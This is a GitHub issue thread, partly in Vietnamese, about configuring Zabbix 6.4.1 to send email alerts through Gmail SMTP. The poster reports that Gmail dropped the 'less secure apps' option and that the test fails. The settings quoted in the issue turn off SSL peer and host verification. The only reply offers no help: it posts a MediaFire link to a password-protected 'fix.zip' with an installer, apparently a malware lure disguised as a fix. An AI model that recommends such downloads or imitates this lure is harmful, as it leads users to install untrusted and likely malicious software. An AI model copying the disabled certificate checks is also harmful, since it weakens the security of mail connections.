### ISSUE TITLE
Zabbix 6.4.1 with Email Configure support Send or Receive Notification

### ISSUE THREAD

**Issue by PhDLeToanThang** [PhDLeToanThang/siem#1]
Zabbix 6.4.1 with Email Configure support Send or Receive Notification.

Tham khảo:  https://yatebts.com/set-up-email-alerts-in-zabbix-using-a-gmail-account/#Step_1_Enable_less_secure_app_access_in_your_Gmail_account  

Ngay ở bước 1. Cấu hình Security for Google Account:

![image](https://github.com/user-attachments/assets/5104cfb1-4705-401b-9ca4-2205c59386ff)

Thực tế là Gmail đã bỏ cấu hình phần này. 

Bước 2.  Set up Email media settings in Zabbix server
Log in into Zabbix server web interface using a web browser. Log in as the Admin user or another user who have access to Administration and Configuration.
Then under the Administration tab, open Media types and choose Email from the list of predefined items, or create another entry.
In the next screen please fill in the form with the following settings for Gmail account:
(All mandatory fields are marked with an asterisk *).
*Name: Email
Type: Email
*SMTP server: smtp.gmail.com
SMTP server port: 587
*SMTP helo: smtp.gmail.com
*SMTP email: youremailaddress@gmail.com (address used in the From field of the email)
Connection security: choose STARTTLS
SSL verify peer: unchecked
SSL verify host: unchecked
Authentication: Username and password
Username: youremailaddress@gmail.com
Password: your_email_password
Enabled: make sure this box is checked
Click on the Update button at the bottom of the form.
After these steps, your form should look like this:
Important: Make sure you can reach to host: smtp.gmail.com on port 587 and your firewall from Zabbix server does not block this connection.
Note: This is the Email address that Zabbix server will use to send email notifications.

Hoặc tham khảo video Youtube: https://www.youtube.com/watch?v=3bMYcCBfjPs 

![image](https://github.com/user-attachments/assets/e9252d42-1751-4e19-b907-66411783b8df)

---> Đã làm được Bước 2, nhưng Bước 1. không còn cấu hình Google Less  Security.

--- > Bấm nút Test bị Fail.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
